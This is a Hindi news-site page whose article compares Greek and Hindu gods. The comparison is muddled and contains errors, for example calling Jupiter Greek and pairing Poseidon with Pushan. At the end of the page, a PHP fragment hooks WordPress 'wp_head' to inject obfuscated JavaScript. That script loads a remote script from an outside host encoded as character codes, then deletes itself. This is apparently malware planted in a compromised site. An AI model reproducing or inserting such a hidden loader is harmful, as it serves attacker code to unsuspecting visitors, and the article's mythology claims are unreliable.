Saturday, June 22, 2024
spot_img

क्या है ग्रीक और हिंदू देवताओं का संबंध??

ग्रीक और हिन्दू देवताओं का सम्बंध और उनके समानताओं के बारे में कई विचार रखे गए हैं, लेकिन इनके मध्ये केवल कुछ ही विशेषताएँ समान हो सकती हैं।



1. समान विशेषताएँ: कुछ ग्रीक और हिन्दू देवताएँ, जैसे कि जुपिटर (ग्रीक: ज्यूपिटर, हिन्दी: बृहस्पति) और हेरा (ग्रीक: हेरा, हिन्दी: इंद्राणी), पान्डियों और देवताओं के बीच आकार, गुण, और पूजा के संदर्भ में समानता दिखा सकते हैं।

2. प्राचीन संगठन: ग्रीक और हिन्दू धर्मों के पारंपरिक इतिहास में, इन दोनों संगठनों ने अपने देवताओं को प्रमुख भाग्यों और समाज के नियमों के पालनकर्ता के रूप में माना है।

3. समुद्र और वायु देवताएँ: ग्रीक मिथोलॉजी में पोसेडन (समुद्र देवता) और यूरोस (वायु देवता) हैं, जो कुछ हद तक वायु (हिन्दी: वायु) और पोजीदन (हिन्दी: पौषण) के समान हो सकते हैं।

हालांकि ये समानताएँ मौजूद हो सकती हैं, इसका यह मतलब नहीं है कि ग्रीक देवताएँ हिन्दू देवताओं की पूर्ण कॉपी हैं। ग्रीक और हिन्दू मिथोलॉजी में विभिन्न दृष्टिकोण और कहानियाँ हैं जो उनके देवताओं के भवन करने के पीछे के सामाजिक, सांस्कृतिक, और ऐतिहासिक संदर्भ को प्रकट करती हैं।

इसलिए, ग्रीक और हिन्दू देवताओं के बीच की यह समानताएँ मिथोलॉजीकल परंपराओं के परिप्रेक्ष्य में देखनी चाहिए और इन्हें केवल एक प्रकार की पूर्वाग्रह से नहीं देखना चाहिए।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>